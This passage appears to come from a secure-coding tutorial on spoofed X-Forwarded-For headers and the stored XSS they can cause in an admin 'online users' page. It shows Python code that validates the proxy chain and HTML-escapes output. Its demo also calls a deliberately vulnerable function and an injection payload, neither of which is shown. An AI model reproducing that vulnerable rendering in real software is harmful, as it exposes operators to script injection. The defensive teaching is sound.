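      peer chose to send: ignore it and use the peer address.
    - Otherwise walk the chain right to left past our own proxies; the first
      foreign hop is the client, but only if it parses as an IP address.
    Returns an ipaddress object, or None when the chain is not parseable."""
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES or not xff_header:
        return peer
    for hop in reversed([h.strip() for h in xff_header.split(",")]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return None  # forged or garbage entry: trust nothing further left
        if addr not in TRUSTED_PROXIES:
            return addr
    return peer


def render_visitor_ip(remote_addr: str, xff_header) -> str:
    """HTML fragment for the 'online users' view: validated value or a fixed
    placeholder. html.escape() stays as a second layer in case this rendering
    code is ever reused for a free-text field."""
    addr = client_ip(remote_addr, xff_header)
    return html.escape(str(addr) if addr is not None else "unknown", quote=True)


def render_untrusted_text(value: str) -> str:
    """The generic fix: encode output for its HTML context so '<' and '>'
    become '&lt;' and '&gt;' and the browser treats the value as text."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    print(visitor_ip_vulnerable(XFF_PAYLOAD))
    print(render_visitor_ip("10.0.0.5", XFF_PAYLOAD))
    print(render_visitor_ip("10.0.0.5", "203.0.113.7, 10.0.0.5"))
    print(render_untrusted_text(XFF_PAYLOAD))
```

Validation and encoding solve different problems here: parsing the hop as an address is what makes the stored "ip" value meaningful for banning or geolocation, while encoding at render time is what keeps any field, valid or not, from executing in the operator's browser.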
